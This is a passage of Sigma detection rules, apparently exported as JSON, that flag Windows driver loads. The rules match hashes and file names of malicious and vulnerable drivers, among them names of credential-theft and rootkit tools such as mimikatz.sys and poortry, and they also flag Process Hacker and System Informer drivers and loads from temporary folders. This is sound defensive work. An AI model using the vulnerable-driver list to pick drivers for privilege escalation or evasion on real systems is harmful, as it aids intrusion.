'SHA256=86047bb1969d1db455493955fd450d18c62a3f36294d0a6c3732c88dfbcc4f62'\n            - 'SHA256=aaf04d89fd15bc61265e545f8e1da80e20f59f90058ed343c62ee24358e3af9e'\n            - 'SHA256=e5ddfa39540d4e7ada56cdc1ebd2eb8c85a408ec078337488a81d1c3f2aaa4ff'\n            - 'SHA256=8b30b2dc36d5e8f1ffc7281352923773fb821cdf66eb6516f82c697a524b599b'\n            - 'SHA256=469713c76c7a887826611b8c7180209a8bb6250f91d0f1eb84ac4d450ef15870'\n            - 'SHA256=a906251667a103a484a6888dca3e9c8c81f513b8f037b98dfc11440802b0d640'\n            - 'SHA256=49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530'\n            - 'SHA256=bcca03ce1dd040e67eb71a7be0b75576316f0b6587b2058786fda8b6f0a5adfd'\n            - 'SHA256=0aab2deae90717a8876d46d257401d265cf90a5db4c57706e4003c19eee33550'\n            - 'SHA256=406b844f4b5c82caf26056c67f9815ad8ecf1e6e5b07d446b456e5ff4a1476f9'\n            - 'SHA256=10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b'\n            - 'SHA256=c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c'\n            - 'SHA256=139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988'\n            - 'SHA256=793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875'\n            - 'SHA256=492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263'\n            - 'SHA256=b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4'\n            - 'SHA256=f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280'\n            - 'SHA256=60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9'\n            - 'SHA256=c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12'\n            - 'SHA256=29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe'\n            - 'SHA256=5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b'\n            - 'SHA256=e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f'\n            - 
'SHA256=770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a'\n            - 'SHA256=b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719'\n            - 'SHA256=bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908'\n            - 'SHA256=4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de'\n            - 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc'\n            - 'SHA256=200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a'\n            - 'SHA256=b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427'\n            - 'SHA256=673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653'\n            - 'SHA256=4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919'\n            - 'SHA256=d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad'\n            - 'SHA256=62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920'\n            - 'SHA256=6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77'\n            - 'SHA256=751e9376cb7cb9de63e1808d43579d787d3f6d659173038fe44a2d7fdb4fd17e'\n            - 'SHA256=87565ff08a93a8ff41ea932bf55dec8e0c7e79aba036507ea45df9d81cb36105'\n            - 'SHA256=2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2'\n            - 'SHA256=627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa'\n            - 'SHA256=94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112'\n            - 'SHA256=704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4'\n            - 'SHA256=d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff'\n            - 'SHA256=0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3'\n            - 'SHA256=14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925'\n            - 'SHA256=3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6'\n            - 
'SHA256=2ce4f8089b02017cbe86a5f25d6bc69dd8b6f5060c918a64a4123a5f3be1e878'\n            - 'SHA256=e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59'\n            - 'SHA256=a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66'\n            - 'SHA256=47356707e610cfd0be97595fbe55246b96a69141e1da579e6f662ddda6dc5280'\n            - 'SHA256=18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7'\n            - 'SHA256=95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167'\n            - 'SHA256=5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a'\n            - 'SHA256=82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7'\n            - 'SHA256=a85d3fd59bb492a290552e5124bfe3f9e26a3086d69d42ccc44737b5a66673ec'\n            - 'SHA256=ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620'\n            - 'SHA256=d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f'\n            - 'SHA256=4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905'\n            - 'SHA256=30061ef383e18e74bb067fbca69544f1a7544e8dc017d4e7633d8379aff4c3c3'\n            - 'SHA256=7433f14b40c674c5e87b6210c330d5bcaf2f6f52d632ae29e9b7cf3ca405665b'\n            - 'SHA256=818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab'\n            - 'SHA256=c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc'\n            - 'SHA256=5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968'\n            - 'SHA256=7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28'\n            - 'SHA256=07759750fbb93c77b5c3957c642a9498fcff3946a5c69317db8d6be24098a4a0'\n            - 'SHA256=51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93'\n            - 'SHA256=e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12'\n            - 'SHA256=2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8'\n            - 
'SHA256=af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895'\n            - 'SHA256=baf7fbc4743a81eb5e4511023692b2dfdc32ba670ba3e4ed8c09db7a19bd82d3'\n            - 'SHA256=a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f'\n            - 'SHA256=4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be'\n            - 'SHA256=e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8'\n            - 'SHA256=69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f'\n            - 'SHA256=93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe'\n            - 'SHA256=bed4285d0f8d18f17ddaa53a98a475c87c04c4d167499e24c770da788e5d45f4'\n            - 'SHA256=fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5'\n            - 'SHA256=07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af'\n            - 'SHA256=9a67626fb468d3f114c23ac73fd8057f43d06393d3eca04da1d6676f89da2d40'\n            - 'SHA256=7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6'\n            - 'SHA256=7a84703552ae032a0d1699a081e422ed6c958bbe56d5b41839c8bfa6395bee1d'\n            - 'SHA256=ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a'\n            - 'SHA256=64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96'\n            - 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497'\n            - 'SHA256=fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2'\n            - 'SHA256=8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce'\n            - 'SHA256=d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96'\n            - 'SHA256=efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576'\n            - 'SHA256=1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80'\n            - 'SHA256=62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266'\n            - 
'SHA256=6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724'\n            - 'SHA256=3033ff03e6f523726638b43d954bc666cdd26483fa5abcf98307952ff88f80ee'\n            - 'SHA256=6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b'\n            - 'SHA256=06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f'\n            - 'SHA256=1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e'\n            - 'SHA256=6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1'\n            - 'SHA256=deade507504d385d8cae11365a2ac9b5e2773ff9b61624d75ffa882d6bb28952'\n            - 'SHA256=c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da'\n            - 'SHA256=8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e'\n            - 'SHA256=88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463'\n            - 'SHA256=b0f1fbadc1d7a77557d3d836f7698bd986a3ec9fc5d534ad3403970f071176f7'\n            - 'SHA256=bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0'\n            - 'SHA256=4dc24fd07f8fb854e685bc540359c59f177de5b91231cc44d6231e33c9e932b1'\n            - 'SHA256=82b0e1d7a27b67f0e6dc39dc41e880bdaef5d1f69fcec38e08da2ed78e805ef9'\n            - 'SHA256=ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a'\n            - 'SHA256=443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85'\n            - 'SHA256=f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac'\n            - 'SHA256=0181d60506b1f3609217487c2c737621d637e1232f243f68c662d045f44d4873'\n            - 'SHA256=c13f5bc4edfbe8f1884320c5d76ca129d00de41a1e61d45195738f125dfe60a7'\n            - 'SHA256=8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38'\n            - 'SHA256=c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c'\n            - 'SHA256=d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c'\n            - 
'SHA256=1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524'\n            - 'SHA256=9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51'\n            - 'SHA256=bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df'\n            - 'SHA256=94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601'\n            - 'SHA256=6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7'\n            - 'SHA256=80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3'\n            - 'SHA256=e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19'\n            - 'SHA256=ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55'\n            - 'SHA256=8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe'\n            - 'SHA256=4f02aed3750bc6a924c75e774404f259f721d8f4081ed68aa01cf73ca5430f85'\n            - 'SHA256=81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1'\n            - 'SHA256=0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06'\n            - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'\n            - 'SHA256=b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3'\n            - 'SHA256=26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55'\n            - 'SHA256=a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778'\n            - 'SHA256=d25b5e4d07f594c640dcd93cfc8ab3f0a38348150bd0bfae89f404fbb0d811c6'\n            - 'SHA256=1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6'\n            - 'SHA256=083a311875173f8c4653e9bbbabb689d14aa86b852e7fa9f5512fc60e0fd2c43'\n            - 'SHA256=89698cad598a56f9e45efffd15d1841e494a2409cc12279150a03842cd6bb7f3'\n            - 'SHA256=a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7'\n            - 'SHA256=02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715'\n            - 
'SHA256=8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434'\n            - 'SHA256=ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0'\n            - 'SHA256=41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f'\n            - 'SHA256=42ff11ddb46dfe5fa895e7babf88ee27790cde53a9139fc384346a89e802a327'\n            - 'SHA256=36f45a42ebf2de6962db92aaf8845d7f9fd6895bedc31422adcf31c59a79602d'\n            - 'SHA256=4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021'\n            - 'SHA256=4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4'\n            - 'SHA256=e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15'\n            - 'SHA256=f0474e76cfd36e37e32cfe5c0a9e05ddee17dd5014d7aa8817ea3634a3540a3f'\n            - 'SHA256=a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2'\n            - 'SHA256=52d5c35325ce701516f8b04380c9fbdb78ec6bcc13b444f758fdb03d545b0677'\n            - 'SHA256=e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d'\n            - 'SHA256=7662187c236003308a7951c2f49c0768636c492f8935292d02f69e59b01d236d'\n            - 'SHA256=24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f'\n            - 'SHA256=b7956e31c2fcc0a84bcedf30e5f8115f4e74eed58916253a0c05c8be47283c57'\n            - 'SHA256=96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc'\n            - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'\n            - 'SHA256=0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35'\n            - 'SHA256=888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440'\n            - 'IMPHASH=8d070a93a45ed8ba6dba6bfbe0d084e7'\n            - 'IMPHASH=7641a0c227f0a3a45b80bb8af43cd152'\n            - 'IMPHASH=7df0d3ee663fc0e7c72a95e44ba4c82c'\n            - 'IMPHASH=70e1caa5a322b56fd7951f1b2caacb0d'\n            - 'IMPHASH=beceab354c66949088c9e5ed1f1ff2a4'\n            - 
'IMPHASH=caa08a0ba5f679b1e5bbae747cb9d626'\n            - 'IMPHASH=420625b024fba72a24025defdf95b303'\n            - 'IMPHASH=65ccc2c578a984c31880b6c5e65257d3'\n            - 'IMPHASH=e717abe060bc5c34925fe3120ac22f45'\n            - 'IMPHASH=41113a3a832353963112b94f4635a383'\n            - 'IMPHASH=3866dd9fe63de457bdbf893bf7050ddf'\n            - 'IMPHASH=3fd33d5b3b52e2db91983ac4b1d7a3c4'\n            - 'IMPHASH=a998fe47a44bfbf2399968e21cfdf7ca'\n            - 'IMPHASH=c9a6e83d931286d1604d1add8403e1e5'\n            - 'IMPHASH=cf0eb2dce2ba2c9ff5dd0da794b8b372'\n            - 'IMPHASH=ea37e43ffc7cfcba181c5cff37a9be1f'\n            - 'IMPHASH=8e35c9460537092672b3c7c14bccc7e0'\n            - 'IMPHASH=7bf14377888c429897eb10a85f70266c'\n            - 'IMPHASH=b351627263648b1d220bb488e7ec7202'\n            - 'IMPHASH=ce10082e1aa4c1c2bd953b4a7208e56a'\n            - 'IMPHASH=a7bd820fa5b895fab06f20739c9f24b8'\n            - 'IMPHASH=be0dd8b8e045356d600ee55a64d9d197'\n            - 'IMPHASH=63fd1582ac2edee50f7ec7eedde38ee8'\n            - 'IMPHASH=6c8d5c79a850eecc2fb0291cebda618d'\n            - 'IMPHASH=c32d9a9af7f702814e1368c689877f3a'\n            - 'IMPHASH=6b387c029257f024a43a73f38afb2629'\n            - 'IMPHASH=df43355c636583e56e92142dcc69cc58'\n            - 'IMPHASH=e3ee9131742bf9c9d43cb9a425e497dd'\n            - 'IMPHASH=c214aac08575c139e48d04f5aee21585'\n            - 'IMPHASH=3c5d2ffd06074f1b09c89465cc8bfbf7'\n            - 'IMPHASH=059c6bd84285f4960e767f032b33f19b'\n            - 'IMPHASH=a09170ef09c55cdca9472c02cb1f2647'\n            - 'IMPHASH=fca0f3c7b6d79f494034b9d2a1f5921a'\n            - 'IMPHASH=0262d4147f21d681f8519ab2af79283f'\n            - 'IMPHASH=832219eb71b8bdb771f1d29d27b0acf4'\n            - 'IMPHASH=514298d18002920ee5a917fc34426417'\n            - 'IMPHASH=26ceec6572c630bdad60c984e51b7da4'\n            - 'IMPHASH=dbf09dd3e675f15c7cc9b4d2b8e6cd90'\n            - 'IMPHASH=4b47f6031c558106eee17655f8f8a32f'\n            - 
'IMPHASH=a6c4a7369500900fc172f9557cff22cf'\n            - 'IMPHASH=3b49942ec6cef1898e97f741b2b5df8a'\n            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'\n            - 'IMPHASH=27f6dc8a247a22308dd1beba5086b302'\n            - 'IMPHASH=7d017945bf90936a6c40f73f91ed02c2'\n            - 'IMPHASH=d51f0f6034eb5e45f0ed4e9b7bbc9c97'\n            - 'IMPHASH=0ad7da35304c75ccf859bc29fe9ed09e'\n            - 'IMPHASH=bf9d32a6ab9effcd2fd6a734e5be98f9'\n            - 'IMPHASH=87fd2b54ed568e2294300e164b8c46f7'\n            - 'IMPHASH=2de3451f3e7b02970582bb8f9fd8c73a'\n            - 'IMPHASH=e97dc162f416bf06745bf9ffdf78a0ff'\n            - 'IMPHASH=2a008187d4a73284ddcc43f1b727b513'\n            - 'IMPHASH=f8e4844312e81dbdb4e8e95e2ad2c127'\n            - 'IMPHASH=4c7cc13a110ccdbb932bb9d7d42efdf4'\n            - 'IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4'\n            - 'IMPHASH=3db9de43d5d530c10d0cd2d43c7a0771'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_mal_drivers_names.yml",
    "content": "title: Malicious Driver Load By Name\nid: 39b64854-5497-4b57-a448-40977b8c9679\nstatus: test\ndescription: Detects loading of known malicious drivers via the file name of the drivers.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-03\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\wfshbr64.sys'\n            - '\\ktmutil7odm.sys'\n            - '\\ktes.sys'\n            - '\\a26363e7b02b13f2b8d697abb90cd5c3.sys'\n            - '\\kt2.sys'\n            - '\\4748696211bd56c2d93c21cab91e82a5.sys'\n            - '\\malicious.sys'\n            - '\\a236e7d654cd932b7d11cb604629a2d0.sys'\n            - '\\spwizimgvt.sys'\n            - '\\c94f405c5929cfcccc8ad00b42c95083.sys'\n            - '\\fur.sys'\n            - '\\wantd.sys'\n            - '\\windbg.sys'\n            - '\\4118b86e490aed091b1a219dba45f332.sys'\n            - '\\gmer64.sys'\n            - '\\1fc7aeeff3ab19004d2e53eae8160ab1.sys'\n            - '\\poortry2.sys'\n            - '\\wintapix.sys'\n            - '\\daxin_blank6.sys'\n            - '\\6771b13a53b9c7449d4891e427735ea2.sys'\n            - '\\blacklotus_driver.sys'\n            - '\\air_system10.sys'\n            - '\\dkrtk.sys'\n            - '\\7.sys'\n            - '\\sense5ext.sys'\n            - '\\ktgn.sys'\n            - '\\ndislan.sys'\n            - '\\nlslexicons0024uvn.sys'\n            - '\\be6318413160e589080df02bb3ca6e6a.sys'\n            - '\\4.sys'\n            - '\\wantd_2.sys'\n            - '\\e29f6311ae87542b3d693c1f38e4e3ad.sys'\n            - '\\daxin_blank3.sys'\n            - '\\gftkyj64.sys'\n            - '\\daxin_blank2.sys'\n            - '\\wantd_4.sys'\n            - '\\reddriver.sys'\n            - '\\834761775.sys'\n  
          - '\\mlgbbiicaihflrnh.sys'\n            - '\\mjj0ge.sys'\n            - '\\daxin_blank.sys'\n            - '\\daxin_blank5.sys'\n            - '\\poortry1.sys'\n            - '\\msqpq.sys'\n            - '\\mimidrv.sys'\n            - '\\e939448b28a4edc81f1f974cebf6e7d2.sys'\n            - '\\prokiller64.sys'\n            - '\\nodedriver.sys'\n            - '\\wantd_3.sys'\n            - '\\lctka.sys'\n            - '\\kapchelper_x64.sys'\n            - '\\daxin_blank4.sys'\n            - '\\a9df5964635ef8bd567ae487c3d214c4.sys'\n            - '\\wantd_6.sys'\n            - '\\ntbios.sys'\n            - '\\wantd_5.sys'\n            - '\\pciecubed.sys'\n            - '\\mimikatz.sys'\n            - '\\nqrmq.sys'\n            - '\\2.sys'\n            - '\\poortry.sys'\n            - '\\ntbios_2.sys'\n            - '\\fgme.sys'\n            - '\\telephonuafy.sys'\n            - '\\typelibde.sys'\n            - '\\daxin_blank1.sys'\n            - '\\ef0e1725aaf0c6c972593f860531a2ea.sys'\n            - '\\5a4fe297c7d42539303137b6d75b150d.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.\n    - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_pua_process_hacker.yml",
    "content": "title: PUA - Process Hacker Driver Load\nid: 67add051-9ee7-4ad3-93ba-42935615ae8d\nrelated:\n    - id: 10cb6535-b31d-4512-9962-513dcbc42cc1\n      type: similar\nstatus: test\ndescription: Detects driver load of the Process Hacker tool\nreferences:\n    - https://processhacker.sourceforge.io/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-16\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - cve.2021-21551\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\kprocesshacker.sys'\n        - Hashes|contains:\n              - 'IMPHASH=821D74031D3F625BCBD0DF08B70F1E77'\n              - 'IMPHASH=F86759BB4DE4320918615DC06E998A39'\n              - 'IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18'\n              - 'IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0'\n    condition: selection\nfalsepositives:\n    - Legitimate use of process hacker or system informer by developers or system administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_pua_system_informer.yml",
    "content": "title: PUA - System Informer Driver Load\nid: 10cb6535-b31d-4512-9962-513dcbc42cc1\nrelated:\n    - id: 67add051-9ee7-4ad3-93ba-42935615ae8d\n      type: similar\nstatus: test\ndescription: Detects driver load of the System Informer tool\nreferences:\n    - https://systeminformer.sourceforge.io/\n    - https://github.com/winsiderss/systeminformer\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-08\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\SystemInformer.sys'\n        - Hashes|contains:\n              - 'SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24'\n              - 'SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454'\n              - 'SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D'\n              - 'SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B'\n              - 'SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D'\n              - 'SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34'\n              - 'SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89'\n              - 'SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB'\n              - 'SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B'\n              - 'SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97'\n              - 'SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656'\n              - 'SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4'\n              - 'SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138'\n    condition: selection\nfalsepositives:\n    - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_susp_temp_use.yml",
    "content": "title: Driver Load From A Temporary Directory\nid: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75\nstatus: test\ndescription: Detects a driver load from a temporary directory\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-12\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: '\\Temp\\'\n    condition: selection\nfalsepositives:\n    - There is a relevant set of false positives depending on applications in the environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_drivers.yml",
    "content": "title: Vulnerable Driver Load\nid: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8\nstatus: test\ndescription: Detects loading of known vulnerable drivers via their hash.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=c996d7971c49252c582171d9380360f2'\n            - 'MD5=da7e98b23b49b7293ee06713032c74f6'\n            - 'MD5=9496585198d726000ea505abc39dbfe9'\n            - 'MD5=649ff59b8e571c1fc6535b31662407aa'\n            - 'MD5=4429f85e2415742c7cf8c9f54905c4b9'\n            - 'MD5=a610cd4c762b5af8575285dafb9baa8f'\n            - 'MD5=d5e76d125d624f8025d534f49e3c4162'\n            - 'MD5=9c8fffef24fc480917236f9a20b80a47'\n            - 'MD5=65b979bcab915c3922578fe77953d789'\n            - 'MD5=598f8fb2317350e5f90b7bd16baf5738'\n            - 'MD5=6691e873354f1914692df104718eebad'\n            - 'MD5=4814205270caa80d35569eee8081838e'\n            - 'MD5=7f9128654c3def08c28e0e13efff0fee'\n            - 'MD5=ce952204558ea66ec1a9632dcbdde8bd'\n            - 'MD5=0c0195c48b6b8582fa6f6373032118da'\n            - 'MD5=370a4ca29a7cf1d6bc0744afc12b236c'\n            - 'MD5=67e03f83c503c3f11843942df32efe5a'\n            - 'MD5=8a70921638ff82bb924456deadcd20e6'\n            - 'MD5=8a212a246b3c41f3ddce5888aaaaacd6'\n            - 'MD5=a346417e9ae2c17a8fbf73302eeb611d'\n            - 'MD5=d4f7c14e92b36c341c41ae93159407dd'\n            - 'MD5=748cf64b95ca83abc35762ad2c25458f'\n            - 'MD5=79ab228766c76cfdf42a64722821711e'\n            - 'MD5=ce67e51b8c0370d1bfe421b79fa8b656'\n            - 